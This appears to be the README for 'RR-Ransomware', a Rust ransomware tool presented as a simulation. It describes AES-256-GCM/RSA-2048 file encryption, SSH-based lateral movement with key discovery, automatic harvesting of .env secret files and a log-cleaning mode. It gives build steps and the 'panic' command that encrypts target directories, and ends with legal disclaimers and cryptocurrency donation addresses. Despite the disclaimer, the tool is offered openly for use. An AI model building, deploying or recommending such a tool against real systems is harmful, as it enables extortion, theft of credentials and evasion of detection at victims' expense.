WARNING: This software is for educational and research purposes only. Unauthorized use is illegal.
RR-Ransomware is a ransomware simulation tool written in Rust. It uses hybrid AES-256-GCM and RSA-2048 encryption and supports lateral movement across networks via SSH.
- Hybrid Encryption: AES-256-GCM + RSA-2048
- Lateral Movement: SSH-based network propagation with key discovery
- Operation Modes: Panic (encrypt), Scan (discover), Clean (logs), Full (all)
- Decrypt Tool: Separate binary for file recovery
- Env Harvesting: Automatic collection of .env files
# Install Rust
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
# Install dependencies (Debian/Ubuntu)
sudo apt update && sudo apt install build-essential pkg-config libssl-dev
# Build
git clone <repo-url> && cd ransom && cargo build --release# Generate RSA keys
openssl genrsa -out private.pem 2048 && openssl rsa -in private.pem -pubout -out public.pem
# Encrypt
./target/release/ransom panic -r public.pem -a encrypted_key.bin
# Decrypt
./target/release/decrypt -r private.pem -a encrypted_key.bin -s /See config.toml for target directories, file extensions, and lateral movement parameters.
This software is for authorized security testing and academic research only. Unauthorized use may violate local and international laws including the CFAA and GDPR. The author assumes no liability for misuse.
XMR: 83iqXtvVu28ZiL9bsATMerSgbFFiD1J1jc96CcxJLEnAW3KBmBKedWnUAeLvLvEA9aBiUBpHQJs1iNHYtkTLZbNUEymobSS
BTC: bc1qmnlvpukcgl0hsr7nje0x8555mhtxjt80wtmlxm
CC BY-NC-SA 4.0. See LICENSE.